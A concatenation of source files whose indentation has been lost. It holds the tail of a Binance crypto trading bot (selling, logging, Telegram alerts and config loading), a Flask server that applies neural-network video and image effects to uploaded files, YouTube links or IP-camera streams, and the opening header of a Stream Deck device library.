write_log(f"I just sold: {coins_sold[coin]['volume']} {coin} @ {LastPrice} Profit: {profit:.2f} {PriceChange-(TRADING_FEE*2):.2f}%")
session_profit=session_profit + (PriceChange-(TRADING_FEE*2))
#read trade log and send info to telegram bot
with open('trades.txt', 'r') as file:
loglinesell = file.readlines()[-1]
lastlogsell = loglinesell.strip('\n').strip(' ')
telesell = str(lastlogsell)
telegram_send.send(messages=[telesell])
with open('maxprice.txt', 'w') as filehandle:
for listitem in sell:
filehandle.write('%s' % listitem)
with open('lastsell.txt', 'w') as filehandle:
for listitem in sell:
filehandle.write('%s' % listitem)
with open('lastsellstatic.txt', 'w') as filehandle:
for listitem in sell:
filehandle.write('%s' % listitem)
profits_file = str(f"{datetime.now()}, {coins_sold[coin]['volume']}, {BuyPrice}, {LastPrice}, {profit:.2f}, {PriceChange-(TRADING_FEE*2):.2f}'\n'")
with open('profits.txt', 'w') as filehandle:
for listitem in profits_file:
filehandle.write('%s' % listitem)
PriceChangestr = str(PriceChange)
with open('pricechange.txt', 'w') as filehandle:
for listitem in PriceChangestr:
filehandle.write('%s' % listitem)
continue
# no action; print once every TIME_DIFFERENCE
if hsp_head == 1:
if len(coins_bought) > 0:
print(f'Sell criteria not yet reached, not selling {coin} for now {BuyPrice} - {LastPrice} : {txcolors.SELL_PROFIT if PriceChange >= 0. else txcolors.SELL_LOSS}{PriceChange-(TRADING_FEE*2):.2f}% Est:${(QUANTITY*(PriceChange-(TRADING_FEE*2)))/100:.2f}{txcolors.DEFAULT}')
if hsp_head == 1 and len(coins_bought) == 0: print(f'Not holding any coins')
#neuer code
return coins_sold
def update_portfolio(orders, last_price, volume):
'''add every coin bought to our portfolio for tracking/selling later'''
if DEBUG: print(orders)
for coin in orders:
coins_bought[coin] = {
'symbol': orders[coin][0]['symbol'],
'orderid': orders[coin][0]['orderId'],
'timestamp': orders[coin][0]['time'],
'bought_at': last_price[coin]['price'],
'volume': volume[coin],
'stop_loss': -STOP_LOSS,
'take_profit': TAKE_PROFIT,
}
# save the coins in a json file in the same directory
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
print(f'Order with id {orders[coin][0]["orderId"]} placed and saved to file')
def remove_from_portfolio(coins_sold):
'''Remove coins sold due to SL or TP from portfolio'''
for coin in coins_sold:
coins_bought.pop(coin)
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
def write_log(logline):
timestamp = datetime.now().strftime("%d/%m %H:%M:%S")
with open(LOG_FILE,'a+') as f:
f.write(timestamp + ' ' + logline + '\n')
if __name__ == '__main__':
# Load arguments then parse settings
args = parse_args()
mymodule = {}
# set to false at Start
global bot_paused
bot_paused = False
DEFAULT_CONFIG_FILE = 'config.yml'
DEFAULT_CREDS_FILE = 'creds.yml'
config_file = args.config if args.config else DEFAULT_CONFIG_FILE
creds_file = args.creds if args.creds else DEFAULT_CREDS_FILE
parsed_config = load_config(config_file)
parsed_creds = load_config(creds_file)
# Default no debugging
DEBUG = False
# Load system vars
TEST_MODE = parsed_config['script_options']['TEST_MODE']
LOG_TRADES = parsed_config['script_options'].get('LOG_TRADES')
LOG_FILE = parsed_config['script_options'].get('LOG_FILE')
DEBUG_SETTING = parsed_config['script_options'].get('DEBUG')
AMERICAN_USER = parsed_config['script_options'].get('AMERICAN_USER')
# Load trading vars
PAIR_WITH = parsed_config['trading_options']['PAIR_WITH']
QUANTITY = parsed_config['trading_options']['QUANTITY']
MAX_COINS = parsed_config['trading_options']['MAX_COINS']
FIATS = parsed_config['trading_options']['FIATS']
TIME_DIFFERENCE = parsed_config['trading_options']['TIME_DIFFERENCE']
RECHECK_INTERVAL = parsed_config['trading_options']['RECHECK_INTERVAL']
CHANGE_IN_PRICE = parsed_config['trading_options']['CHANGE_IN_PRICE']
CUSTOM_LIST = parsed_config['trading_options']['CUSTOM_LIST']
TICKERS_LIST = parsed_config['trading_options']['TICKERS_LIST']
TRADING_FEE = parsed_config['trading_options']['TRADING_FEE']
SIGNALLING_MODULES = parsed_config['trading_options']['SIGNALLING_MODULES']
if DEBUG_SETTING or args.debug:
DEBUG = True
# Load creds for correct environment
access_key, secret_key = load_correct_creds(parsed_creds)
if DEBUG:
print(f'loaded config below\n{json.dumps(parsed_config, indent=4)}')
print(f'Your credentials have been loaded from {creds_file}')
# Authenticate with the client, Ensure API key is good before continuing
if AMERICAN_USER:
client = Client(access_key, secret_key, tld='us')
else:
client = Client(access_key, secret_key)
# If the users has a bad / incorrect API key.
# this will stop the script from starting, and display a helpful error.
api_ready, msg = test_api_key(client, BinanceAPIException)
if api_ready is not True:
exit(f'{txcolors.SELL_LOSS}{msg}{txcolors.DEFAULT}')
# Use CUSTOM_LIST symbols if CUSTOM_LIST is set to True
if CUSTOM_LIST: tickers=[line.strip() for line in open(TICKERS_LIST)]
# try to load all the coins bought by the bot if the file exists and is not empty
coins_bought = {}
# path to the saved coins_bought file
coins_bought_file_path = 'coins_bought.json'
# rolling window of prices; cyclical queue
historical_prices = [None] * (TIME_DIFFERENCE * RECHECK_INTERVAL)
hsp_head = -1
# prevent including a coin in volatile_coins if it has already appeared there less than TIME_DIFFERENCE minutes ago
volatility_cooloff = {}
# use separate files for testing and live trading
if TEST_MODE:
coins_bought_file_path = 'test_' + coins_bought_file_path
# if saved coins_bought json file exists and it's not empty then load it
if os.path.isfile(coins_bought_file_path) and os.stat(coins_bought_file_path).st_size!= 0:
with open(coins_bought_file_path) as file:
coins_bought = json.load(file)
print('Press Ctrl-Q to stop the script')
if not TEST_MODE:
if not args.notimeout: # if notimeout skip this (fast for dev tests)
print('WARNING: You are using the Mainnet and live funds. Waiting 1 seconds as a security measure')
time.sleep(1)
signals = glob.glob("signals/*.exs")
for filename in signals:
for line in open(filename):
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}')
if os.path.isfile("signals/paused.exc"):
try:
os.remove("signals/paused.exc")
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}')
# load signalling modules
try:
if len(SIGNALLING_MODULES) > 0:
for module in SIGNALLING_MODULES:
print(f'Starting {module}')
mymodule[module] = importlib.import_module(module)
t = threading.Thread(target=mymodule[module].do_work, args=())
t.daemon = True
t.start()
time.sleep(2)
else:
print(f'No modules to load {SIGNALLING_MODULES}')
except Exception as e:
print(e)
# seed initial prices
get_price()
READ_TIMEOUT_COUNT=0
CONNECTION_ERROR_COUNT = 0
while True:
try:
orders, last_price, volume = buy()
update_portfolio(orders, last_price, volume)
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
except ReadTimeout as rt:
READ_TIMEOUT_COUNT += 1
print(f'{txcolors.WARNING}We got a timeout error from from binance. Going to re-loop. Current Count: {READ_TIMEOUT_COUNT}\n{rt}{txcolors.DEFAULT}')
except ConnectionError as ce:
CONNECTION_ERROR_COUNT +=1
print(f'{txcolors.WARNING}We got a timeout error from from binance. Going to re-loop. Current Count: {CONNECTION_ERROR_COUNT}\n{ce}{txcolors.DEFAULT}')
|
processing.py
|
# Examples:
# python processing.py -i 192.168.0.12 -o 8002 -s http://192.82.150.11:8083/mjpg/video.mjpg -c a -m ipcam
# python processing.py -i 192.168.0.12 -o 8002 -s https://youtu.be/5JJu-CTDLoc -c a -m video
# python processing.py -i 192.168.0.12 -o 8002 -s my_video.avi -c a -m video
# python processing.py -i 192.168.0.12 -o 8002 -s my_image.jpg -c t -m image
from flask import jsonify
from flask import Flask
from flask import render_template
import threading
import argparse
from flask import request, Response
import psutil
from mode_selector import *
from werkzeug.utils import secure_filename
from zipfile import ZipFile
import pafy
app = Flask(__name__, static_url_path="/static")
app.config["SEND_FILE_MAX_AGE_DEFAULT"] = 0
UPLOAD_FOLDER = "static/user_uploads/"
ALLOWED_EXTENSIONS = set(
["png", "jpg", "jpeg", "gif", "mp4", "avi", "m4v", "webm", "mkv"]
)
class State:
# Working states and lock commands
view_source = False
source_image = ""
source_url = ""
source_mode = ""
output_file_page = ""
screenshot_path = ""
need_to_create_screenshot = False
screenshot_ready = False
working_on = True
frame_processed = 0
total_frames = 0
options = ""
screenshot_lock = False
video_reset_lock = False
video_stop_lock = False
mode_reset_lock = False
source_lock = False
render_mode = ""
superres_model = "LAPSRN"
esrgan_model = "FALCOON"
# Rendering modes dictionary
render_modes_dict = {
'using_yolo_network': False,
'using_caffe_network': False,
'using_mask_rcnn_network': False,
'canny_people_on_background': False,
'canny_people_on_black': False,
'extract_and_replace_background': False,
'extract_and_cut_background': False,
'color_canny': False,
'color_canny_on_background': False,
'color_objects_on_gray_blur': False,
'color_objects_blur': False,
'color_objects_on_gray': False,
'caffe_colorization': False,
'cartoon_effect': False,
'extract_objects_yolo_mode': False,
'text_render_yolo': False,
'denoise_and_sharpen': False,
'sobel': False,
'ascii_painter': False,
'pencil_drawer': False,
'two_colored': False,
'upscale_opencv': False,
'upscale_esrgan': False,
'boost_fps_dain': False
}
# Default rendering settings
# Values will change with AJAX requests
settings_ajax = {
"viewSource" : False,
"cannyBlurSliderValue" : 5,
"cannyThresSliderValue" : 50,
"cannyThresSliderValue2" : 50,
"cannyThres2" : 50,
"saturationSliderValue" : 100,
"contrastSliderValue" : 100,
"brightnessSliderValue" : 0,
"positionSliderValue" : 1,
"confidenceSliderValue" : 20,
"lineThicknessSliderValue" : 2,
"denoiseSliderValue" : 10,
"denoiseSliderValue2" : 10,
"sharpenSliderValue" : 5,
"sharpenSliderValue2" : 5,
"rcnnSizeSliderValue" : 10,
"rcnnBlurSliderValue" : 17,
"sobelSliderValue" : 3,
"asciiSizeSliderValue" : 4,
"asciiIntervalSliderValue" : 10,
"asciiThicknessSliderValue" : 1,
"resizeSliderValue" : 2,
"colorCountSliderValue" : 32,
"mode" : "a",
"superresModel" : "LapSRN",
"esrganModel" : "FALCOON",
"urlSource": "default"
}
server_states = State() # Global instance for accessing settings from requests and rendering loop
timer_start = 0 # Start timer for stopping rendering if user closed tab
timer_end = 0 # End timer for stopping rendering if user closed tab
user_time = 0 # For user timer debug
output_frame = None # Frame to preview on page
progress = 0 # Rendering progress 0-100%
cap = None # VideoCapture object for user frames
cap2 = None # VideoCapture object for secondary video (need for some effects)
lock = threading.Lock() # Lock for thread (multiple browser connections viewing)
main_frame = None # Processing frame from video, image or youtube URL
frame_background = None # Frame for secondary video
fourcc = cv2.VideoWriter_fourcc(*"MJPG") # Format for video saving
writer = None # Writer for video saving
url = ""
def check_if_user_is_connected(timer_start, seconds_to_disconnect):
"""
Stops rendering process after a few seconds if user closed browser tab
:param timer_start: moment of last AJAX user ping
:param seconds_to_disconnect: number of seconds to shutdown
:return:
"""
global user_time
timer_end = time.perf_counter()
user_time = str(round(timer_end)) + ":" + str(round(timer_start))
# print(timer_start)
if not (timer_end - timer_start < seconds_to_disconnect and timer_start != 0):
# print("User is connected")
if timer_start != 0:
print(
"User disconnected, shutting down!"
)
current_pid = os.getpid()
p = psutil.Process(current_pid)
p.terminate() # or p.kill()
def process_frame():
"""
Main rendering function
:return:
"""
global cap, lock, writer, progress, fps, output_frame, file_to_render, zip_obj
frame_boost_list = [] # List for Depth-Aware Video Frame Interpolation frames
frame_boost_sequence = [] # Interpolated frame sequence for video writing
server_states.frame_processed = 0 # Total frames processed
server_states.total_frames = 0 # Total frames in video
received_zip_command = False # Trigger for receiving YOLO objects downloading command by user
file_changed = False # Trigger for file changing by user
started_rendering_video = False # Trigger for start rendering video by user
need_mode_reset = True # Trigger for rendering mode changing by user
server_states.working_on = True # Rendering state is ON
concated = None
need_to_create_new_zip = True # Loop state to open new zip archive
need_to_stop_new_zip = False # Loop state to close zip archive
zip_is_opened = True # Loop state for saving new images to zip archive
zipped_images = False # Loop state for closed zip archive
font = cv2.FONT_HERSHEY_SIMPLEX # Font for rendering stats on frame by OpenCV
resized = None # Resized frame to put on page
fps = 0 # FPS rate
frameEdge = None # Last frame of interpolation sequence
path_to_file, file_to_render = os.path.split(args["source"]) # Get filename from full path
print ("Processing file: " + file_to_render)
server_states.source_url = args["source"] # Youtube URL
server_states.render_mode = args["optionsList"] # Rendering mode from command line
server_states.source_mode = args["mode"] # Source type from command line
# Set source for youtube capturing
if server_states.source_mode == "youtube":
vPafy = pafy.new(server_states.source_url)
play = vPafy.streams[0]
cap = cv2.VideoCapture(play.url)
server_states.total_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
# Set source for ip camera capturing
if server_states.source_mode == "ipcam":
cap = cv2.VideoCapture()
cap.open(server_states.source_url)
server_states.total_frames = 1
# Set source for video file capturing
if server_states.source_mode == "video":
cap = cv2.VideoCapture(f"{app.config['UPLOAD_FOLDER']}{file_to_render}")
server_states.total_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
# Set source for image file capturing
if server_states.source_mode == "image":
path_to_image, image_file = os.path.split(args["source"])
server_states.source_image = image_file
cap2 = cv2.VideoCapture("input_videos/space.webm") # Secondary video for background replacement
zip_obj = ZipFile(f"static/user_renders/output{args['port']}.zip", "w") # Zip file with user port name
# Initialize all models
caffe_network = initialize_caffe_network()
caffe_network.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)
caffe_network.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)
superres_network = initialize_superres_network("LAPSRN")
esrgan_network, device = initialize_esrgan_network("FALCOON", True)
rcnn_network = initialize_rcnn_network(True)
dain_network = initialize_dain_network(True)
yolo_network, layers_names, output_layers, colors_yolo = initialize_yolo_network(
classes, True
)
frame_interp_num = 0 # Interpolated frame number
main_frame = None
f = f1 = None # Two source frames for interpolation
# =============================== Main processing loop ===============================
while server_states.working_on:
# Receive all HTML slider values from JSON dictionary
if settings_ajax is not None:
mode_from_page = str(settings_ajax["mode"])
superres_model_from_page = str(settings_ajax["superresModel"])
esrgan_model_from_page = str(settings_ajax["esrganModel"])
position_value_local = int(settings_ajax["positionSliderValue"])
server_states.view_source = bool(settings_ajax["viewSource"])
# Check if mode change command was received
if server_states.mode_reset_lock:
server_states.render_mode = mode_from_page
server_states.superres_model = superres_model_from_page
server_states.esrgan_model = esrgan_model_from_page
server_states.mode_reset_lock = False
need_mode_reset = True
# Check if video rendering start command was received
if server_states.video_reset_lock:
position_value = 1 # Reset position
need_to_create_writer = True # Create new writer
started_rendering_video = True
received_zip_command = True
server_states.video_reset_lock = False
# print("in loop reset")
else:
position_value = position_value_local # Read frame position from slider
# Check if video rendering stop command was received
if server_states.video_stop_lock:
position_value = 1
started_rendering_video = False
server_states.video_stop_lock = False
# print("in loop stop")
# Check if taking screenshot command was received
if server_states.screenshot_lock:
# print("in loop screenshot")
server_states.need_to_create_screenshot = True
server_states.screenshot_lock = False
else:
position_value = 1
# If user changed rendering mode
if need_mode_reset:
frame_interp_num = 0
# Reset all modes
for mode in render_modes_dict:
render_modes_dict[mode] = False
# print("need mode reset")
# Reinitialize upscale networks with user models from page
superres_network = initialize_superres_network(server_states.superres_model)
esrgan_network, device = initialize_esrgan_network(server_states.esrgan_model, True)
# Set processing algorithm from HTML page
for mode in server_states.render_mode:
if mode == "a":
render_modes_dict['extract_objects_yolo_mode'] = True
render_modes_dict['using_yolo_network'] = True
print("extract_objects_yolo")
if mode == "b":
render_modes_dict['text_render_yolo'] = True
render_modes_dict['using_yolo_network'] = True
print("text_render_yolo")
if mode == "c":
render_modes_dict['canny_people_on_black'] = True
render_modes_dict['using_yolo_network'] = True
print("canny_people_on_black")
if mode == "d":
render_modes_dict['canny_people_on_background'] = True
render_modes_dict['using_yolo_network'] = True
print("canny_people_on_background")
if mode == "e":
render_modes_dict['cartoon_effect'] = True
print("cartoon_effect")
if mode == "f":
render_modes_dict['caffe_colorization'] = True
render_modes_dict['using_caffe_network'] = True
print("caffe_colorization")
if mode == "g":
render_modes_dict['using_mask_rcnn_network'] = True
render_modes_dict['extract_and_cut_background'] = True
print("cannyPeopleRCNN + cut background")
if mode == "h":
render_modes_dict['using_mask_rcnn_network'] = True
render_modes_dict['color_canny_on_background'] = True
print("color_canny_on_background")
if mode == "i":
render_modes_dict['using_mask_rcnn_network'] = True
render_modes_dict['extract_and_replace_background'] = True
print("cannyPeopleRCNN + replace background")
if mode == "j":
render_modes_dict['using_mask_rcnn_network'] = True
render_modes_dict['color_canny'] = True
print("color_canny")
if mode == "k":
render_modes_dict['using_mask_rcnn_network'] = True
render_modes_dict['color_objects_on_gray'] = True
print("color_objects_on_gray")
if mode == "l":
render_modes_dict['using_mask_rcnn_network'] = True
render_modes_dict['color_objects_on_gray_blur'] = True
print("color_objects_on_gray_blur")
if mode == "m":
render_modes_dict['using_mask_rcnn_network'] = True
render_modes_dict['color_objects_blur'] = True
print("color_objects_on_gray_blur")
if mode == "n":
render_modes_dict['upscale_opencv'] = True
print("imageUpscaler")
if mode == "o":
render_modes_dict['denoise_and_sharpen'] = True
print("denoise_and_sharpen")
if mode == "p":
render_modes_dict['sobel'] = True
print("sobel")
if mode == "q":
render_modes_dict['ascii_painter'] = True
print("ascii_painter")
if mode == "r":
render_modes_dict['pencil_drawer'] = True
print("pencil_drawer")
if mode == "s":
render_modes_dict['two_colored'] = True
print("two_colored")
if mode == "t":
render_modes_dict['upscale_esrgan'] = True
print("upscale_esrgan")
if mode == "z":
render_modes_dict['boost_fps_dain'] = True
print("boost_fps_dain")
need_mode_reset = False
# Prepare settings if source is a video file or youtube/ipcam url
if server_states.source_mode in ("video", "youtube", "ipcam"):
# If stopped rendering
if not started_rendering_video:
# print("in stop loop")
if (cap is not None):
cap.set(1, position_value) # Set current video position from HTML slider value
server_states.frame_processed = 0
if need_to_stop_new_zip:
zip_obj.close()
zip_is_opened = False
need_to_stop_new_zip = False
need_to_create_new_zip = True
else:
# If started rendering
if need_to_create_writer or file_changed:
# cap.set(1, 1)
server_states.frame_processed = 0
# cap.release()
if writer is not None:
writer.release()
if server_states.source_mode == "video":
# cap = cv2.VideoCapture(f"{app.config['UPLOAD_FOLDER']}{file_to_render}")
server_states.total_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
if (render_modes_dict['boost_fps_dain']):
# fps_out = cap.get(cv2.CAP_PROP_FRAME_COUNT) * 7
# Change FPS output with DAIN mode
writer = cv2.VideoWriter(
f"static/user_renders/output{args['port']}{file_to_render}.avi",
fourcc,
60,
(main_frame.shape[1], main_frame.shape[0]),
True,
)
else:
writer = cv2.VideoWriter(
f"static/user_renders/output{args['port']}{file_to_render}.avi",
fourcc,
25,
(main_frame.shape[1], main_frame.shape[0]),
True,
)
if server_states.source_mode == "youtube":
vPafy = pafy.new(server_states.source_url)
play = vPafy.streams[0]
# cap = cv2.VideoCapture(play.url)
server_states.total_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
if (render_modes_dict['boost_fps_dain']):
# fps_out = cap.get(cv2.CAP_PROP_FRAME_COUNT) * 7
# Change FPS output with DAIN mode
writer = cv2.VideoWriter(
f"static/user_renders/output{args['port']}youtube.avi",
fourcc,
60,
(main_frame.shape[1], main_frame.shape[0]),
True,
)
else:
writer = cv2.VideoWriter(
f"static/user_renders/output{args['port']}youtube.avi",
fourcc,
25,
(main_frame.shape[1], main_frame.shape[0]),
True,
)
if server_states.source_mode == "ipcam":
# source_url = str(settings_ajax["urlSource"])
cap = cv2.VideoCapture()
cap.open(server_states.source_url)
server_states.total_frames = 1
# server_states.source_lock = False
writer = cv2.VideoWriter(
f"static/user_renders/output{args['port']}ipcam.avi",
fourcc,
25,
(main_frame.shape[1], main_frame.shape[0]),
True,
)
# print("CREATING WRITER 1 WITH SIZE:" + str(round(main_frame.shape[1])))
# Prepare zip opening for YOLO objects
if need_to_create_new_zip:
zip_obj = ZipFile(f"static/user_renders/output{args['port']}.zip", "w")
need_to_stop_new_zip = True
need_to_create_new_zip = False
zip_is_opened = True
if file_changed:
zip_obj = ZipFile(f"static/user_renders/output{args['port']}.zip", "w")
zip_is_opened = True
file_changed = False
need_to_create_writer = False
# Fill f and f1 pair of frames for DAIN interpolation
if (render_modes_dict['boost_fps_dain']):
if (started_rendering_video):
if (frame_interp_num == 0):
cap.set(1, 0)
ret, f = cap.read()
ret, f1 = cap.read()
if (f1 is not None):
main_frame = f1.copy()
frame_interp_num += 1
else:
f = frameEdge
ret, f1 = cap.read()
if (f1 is not None):
main_frame = f1.copy()
else:
main_frame = None
else:
ret, main_frame = cap.read()
ret2, frame_background = cap2.read()
# ... otherwise read by one frame
else:
if (cap is not None):
ret, main_frame = cap.read()
ret2, frame_background = cap2.read()
# Prepare settings for image file
if server_states.source_mode == "image":
# Prepare zip opening for YOLO objects
if received_zip_command or file_changed:
zipped_images = False
zip_obj = ZipFile(f"static/user_renders/output{args['port']}.zip", "w")
zip_is_opened = True
received_zip_command = False
# print("CREATED ZIP =========================")
if file_changed:
zip_obj = ZipFile(f"static/user_renders/output{args['port']}.zip", "w")
zip_is_opened = True
file_changed = False
need_to_create_writer = False
main_frame = cv2.imread(f"{app.config['UPLOAD_FOLDER']}{server_states.source_image}")
ret2, frame_background = cap2.read()
classes_index = []
start_moment = time.time() # Timer for FPS calculation
# =============================== Draw frame with render modes and settings ===============================
if main_frame is not None:
if not server_states.view_source:
main_frame, frame_boost_sequence, frame_boost_list, classes_index, zipped_images, zip_obj, zip_is_opened = \
render_with_mode(render_modes_dict, settings_ajax, main_frame, frame_background, f, f1, yolo_network,
rcnn_network, caffe_network, superres_network, dain_network, esrgan_network,
device, output_layers, classes_index, zip_obj, zip_is_opened, zipped_images,
server_states, started_rendering_video)
with lock:
check_if_user_is_connected(timer_start, 7) # Terminate process if browser tab was closed
server_states.frame_processed += 1
elapsed_time = time.time()
fps = 1 / (elapsed_time - start_moment)
# Resize frame for HTML preview with correct aspect ratio
x_coeff = 460 / main_frame.shape[0]
x_size = round(x_coeff * main_frame.shape[1])
resized = cv2.resize(main_frame, (x_size, 460))
if render_modes_dict['extract_objects_yolo_mode'] and not server_states.view_source:
resized = draw_yolo_stats(resized, classes_index, font)
if server_states.source_mode == "image":
cv2.imwrite(
f"static/user_renders/output{args['port']}{server_states.source_image}",
main_frame,
)
if (
server_states.source_mode == "image"
and render_modes_dict['extract_and_replace_background']
and writer is not None
):
writer.write(main_frame)
# Two frames in one example
# resized1 = cv2.resize(frameList[streamIndex], (640, 360))
# resized2 = cv2.resize(main_frame, (640, 360))
# concated = cv2.vconcat([resized2, resized1, ])
# resized = cv2.resize(main_frame, (1600, 900))
# Write DAIN interpolated frames to file
if (
server_states.source_mode in ("video", "youtube", "ipcam")
and writer is not None
and started_rendering_video
):
if render_modes_dict['boost_fps_dain'] and started_rendering_video:
frame_boost_sequence, frame_boost_list = zip(
*sorted(zip(frame_boost_sequence, frame_boost_list)))
frameEdge = frame_boost_list[len(frame_boost_list)-1]
for i in range (len(frame_boost_list) - 1):
writer.write(frame_boost_list[i])
# cv2.imshow("video", frame)
key = cv2.waitKey(1) & 0xFF
if key == ord("q"):
break
else:
writer.write(main_frame)
# Preview rendering on server
cv2.imshow("video", main_frame)
key = cv2.waitKey(1) & 0xFF
if key == ord("q"):
break
# Calculate progress
if server_states.source_mode in ("video", "youtube"):
if server_states.total_frames != 0:
progress = (
server_states.frame_processed
/ server_states.total_frames
* 100
)
# Draw stats on frame
cv2.putText(
resized,
f"FPS: {str(round(fps, 2))} ({str(main_frame.shape[1])}x{str(main_frame.shape[0])})",
(40, 35),
font,
0.8,
(0, 0, 255),
2,
lineType=cv2.LINE_AA
)
if started_rendering_video:
out_file = ""
if server_states.source_mode == "youtube":
out_file = server_states.output_file_page
if server_states.source_mode in ("video", "image"):
out_file = f"output{args['port']}{file_to_render}"
cv2.putText(
resized,
f"Writing to '{out_file}' ({round(progress, 2)}%)",
(40, resized.shape[0] - 20),
font,
0.8,
(255, 0, 255),
2,
lineType=cv2.LINE_AA
)
# Copy resized frame to HTML output
output_frame = resized
# Need for communication between start page and user process
if server_states.frame_processed == 1:
print("started")
# Take screenshot if needed
if server_states.need_to_create_screenshot:
server_states.need_to_create_screenshot = False
print("Taking screenshot...")
cv2.imwrite(
f"static/user_renders/output{args['port']}Screenshot.png", main_frame
)
time.sleep(0.5)
server_states.screenshot_path = (
f"static/user_renders/output{args['port']}Screenshot.png"
)
server_states.screenshot_ready = True
if (server_states.source_mode == "image"):
started_rendering_video = False
# ... otherwise stop rendering
else:
zip_obj.close()
check_if_user_is_connected(timer_start, 7)
started_rendering_video = False
if (writer):
writer.release()
position_value = 1
# print("==================== finished ====================")
app.config["UPLOAD_FOLDER"] = UPLOAD_FOLDER
def allowed_file(filename):
return "." in filename and filename.rsplit(".", 1)[1] in ALLOWED_EXTENSIONS
def generate():
global output_frame, lock, server_states
while server_states.working_on:
with lock:
if output_frame is None:
continue
(flag, encoded_image) = cv2.imencode(".jpg", output_frame)
if not flag:
continue
yield (
b"--frame\r\n"
b"Content-Type: image/jpeg\r\n\r\n" + bytearray(encoded_image) + b"\r\n"
)
print("yield finished")
@app.route("/", methods=["GET", "POST"])
def index(device=None, action=None):
global cap, cap2, file_to_render, file_changed, server_states
if request.method == "POST":
file = None
textbox_string = ""
if 'file' in request.files:
file = request.files["file"]
print("in file")
if 'textbox' in request.form:
textbox_string = request.form.get("textbox")
# print(textbox_string.find("you"))
if textbox_string.find("youtu") != -1:
server_states.source_mode = "youtube"
server_states.source_url = textbox_string
vPafy = pafy.new(textbox_string)
play = vPafy.streams[0]
cap = cv2.VideoCapture(play.url)
server_states.total_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
file_changed = True
if textbox_string.find("mjpg") != -1:
server_states.source_mode = "ipcam"
server_states.source_url = textbox_string
cap = cv2.VideoCapture()
cap.open(textbox_string)
server_states.total_frames = 1
file_changed = True
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config["UPLOAD_FOLDER"], filename))
file_extension = filename.rsplit(".", 1)[1]
if file_extension in("png", "jpg", "jpeg"):
server_states.source_mode = "image"
server_states.source_image = filename
cap2 = cv2.VideoCapture("input_videos/space.webm")
if file_extension in ("gif", "mp4", "avi", "m4v", "webm", "mkv"):
server_states.source_mode = "video"
cap = cv2.VideoCapture(os.path.join(app.config["UPLOAD_FOLDER"], filename))
server_states.total_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
cap2 = cv2.VideoCapture("input_videos/space.webm")
CRED = "\033[91m"
CEND = "\033[0m"
print(
CRED
+ f"============== file {filename} uploaded ============== "
+ CEND
)
file_to_render = filename
file_changed = True
if server_states.source_mode == "video":
server_states.output_file_page = file_to_render + ".avi"
if server_states.source_mode == "youtube":
server_states.output_file_page = "youtube.avi"
if server_states.source_mode == "ipcam":
server_states.output_file_page = "ipcam.avi"
print("server_states.source_mode")
return render_template(
"index.html",
frame_processed=server_states.frame_processed,
pathToRenderedFile=f"static/user_renders/output{args['port']}{server_states.output_file_page}",
pathToZipFile=f"static/user_renders/output{args['port']}.zip",
)
@app.route("/video")
def video_feed():
# redirect(f"http://192.168.0.12:8000/results")
return Response(generate(), mimetype="multipart/x-mixed-replace; boundary=frame")
@app.route("/stats", methods=["POST"])
def send_stats():
global server_states, user_time
# timer_start = time.perf_counter()
frame_width_to_page = 0
frame_height_to_page = 0
screenshot_ready_local = False
if server_states.screenshot_ready:
screenshot_ready_local = True
server_states.screenshot_ready = False
if server_states.source_mode in ("video", "youtube", "ipcam"):
if (cap != None):
frame_width_to_page = cap.get(cv2.CAP_PROP_FRAME_WIDTH)
frame_height_to_page = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
if server_states.source_mode == "image":
frame_width_to_page = 0
frame_height_to_page = 0
return jsonify(
{
"value": server_states.frame_processed,
"totalFrames": server_states.total_frames,
"progress": round(progress, 2),
"fps": round(fps, 2),
"workingOn": server_states.working_on,
"cpuUsage": psutil.cpu_percent(),
"freeRam": round((psutil.virtual_memory()[1] / 2.0 ** 30), 2),
"ramPercent": psutil.virtual_memory()[2],
"frameWidth": frame_width_to_page,
"frameHeight": frame_height_to_page,
"currentMode": server_states.render_mode,
"userTime": user_time,
"screenshotReady": screenshot_ready_local,
"screenshotPath": server_states.screenshot_path
# 'time': datetime.datetime.now().strftime("%H:%M:%S"),
}
)
@app.route("/settings", methods=["GET", "POST"])
def receive_settings():
global settings_ajax, timer_start, timer_end, writer, server_states, commands
if request.method == "POST":
# print("POST")
timer_start = time.perf_counter()
settings_ajax = request.get_json()
if not server_states.mode_reset_lock:
if bool(settings_ajax["modeResetCommand"]):
server_states.mode_reset_lock = True
if not server_states.video_stop_lock:
if bool(settings_ajax["videoStopCommand"]):
server_states.video_stop_lock = True
if not server_states.video_reset_lock:
if bool(settings_ajax["videoResetCommand"]):
server_states.video_reset_lock = True
if not server_states.screenshot_lock:
if bool(settings_ajax["screenshotCommand"]):
server_states.screenshot_lock = True
print("screenshot_lock")
return "", 200
if __name__ == "__main__":
ap = argparse.ArgumentParser()
ap.add_argument(
"-i", "--ip", type=str, required=True, help="ip address of the device"
)
ap.add_argument(
"-o",
"--port",
type=int,
required=True,
help="port number of the server",
)
ap.add_argument("-s", "--source", type=str, default=32, help="file to render")
ap.add_argument(
"-c", "--optionsList", type=str, required=True, help="rendering options"
)
ap.add_argument(
"-m",
"--mode",
type=str,
required=True,
help="rendering mode: 'video' or 'image'",
)
args = vars(ap.parse_args())
t = threading.Thread(target=process_frame)
t.daemon = True
t.start()
app.run(
host=args["ip"],
port=args["port"],
debug=False,
threaded=True,
use_reloader=False,
)
|
StreamDeck.py
|
# Python Stream Deck Library
# Released under the MIT license
#
# dean [at] fourwalledcubicle [dot] com
# www.fourwalledcubicle.com
#
import threading
class DeviceManager(object):
"""
Central device manager, to enumerate any attached StreamDeck devices. An
instance of this class must be created in order to detect and use any
StreamDeck devices.
"""
